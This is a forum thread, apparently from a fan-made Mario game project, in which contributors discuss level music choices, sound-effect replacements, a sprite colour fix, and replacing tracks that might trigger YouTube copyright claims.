I designed Intro 6 with Brinstar (now Haunted Ballroom) (first room) and SMW Cave (now Volcanic Expedition) (second room) in mind.
Haunted Ballroom should be fine, it was meant to be some kind of ominously atmospheric track, though Volcanic Expedition seems a tad too "heroic": the SMB Castle replacements sounds like the best fit right now (or maybe even Totally Rad Volcano).
If there are no other changes needed to the level feel free to do whatever with it.

Also, would it be feasible for most level creators to have a look at the new music and decide whether to use some of it? This might help reducing the global package size if some of the new tracks end up fitting better than the current custom music (I did this with my Crazed Circuitry).

A2MBXT Sounds

Hey. It appears that I've somehow lost the work I already did on sound replacements during moving all my data around and formatting and reformatting and whatnot. Fortunately, I have all the source files. Given that there's some ideas, and given time, probably the best solution would be accepting suggestions and everything. Fortunately I'm less busy than I thought I would be!

Just note for some sounds, you can't make it any longer than the default, or else it will cause sound issues ( http://valtteri.prophpbb.com/post2229.h ... 9bbc#p2229 )

Anyway, give me a few minutes, and I might post some ideas for you.

I'm pretty sure that the mask for Catnip's head is miscoloured. The hex code for the white part is #F8F8F8.

For world 6 we need cave OW music for a portion. I think ambient cave noises would work for this. Anyone good with sound could make it.

Hey, so with the whole new Youtube copyright ID situation, a few of us (namely SAJewers and I) are wondering if there should be even more changes to particular pieces of music heard in some levels of A2MBXT. Here's just a few we've come up with that I need help deciding whether to change them or not:

Navel of the Universe -
Skyward Sword / Inside House
Kingdom Hearts 3DS Music
Poison Tree -
Final Fantasy IX Music
Superfluous Security -
Rusty Heart OST
I need your guy's opinion on these whether they can stay in or not, taking into account the Youtube ID thing.

Also, if your level has Donkey Kong Country Returns Music, please replace it with something else as it's one of the only games where copyright has been an issue. The only level that has it that I've found is:
Plant Zone

Again, please replace all DKC Returns OSTs if it's your level.

Finally, if there's any music that you might be worried about with copyright and stuff, bring it up in this thread.

EDIT: Also, there was a guy who said he would make OW music for us, but his name/post got lost in the Talkhaustrophe. Based on the Credits, I think the guy's name was BlueWizrobe. If someone can get in contact with him and see if he's still gonna contribute a song, that would be great. (raocow, this might be something you wanna mention in an upcoming video)

I was digging through my archives and found some instrumental tracks. I have no idea if they're appropriate or not and, if they are, they'd probably need to be reduced in volume. Anyway, here they are if you can find any use for them, although no pressure to.

While digging further through my archives I found another track that might be useful as a boss or special track or something like that. The mixing on it is pretty shithouse though so I'm going to redo it when I get back from work. It should be done within 12 hours from this post or 36 hours at the max.

Why even bother changing the built-in credits music then?
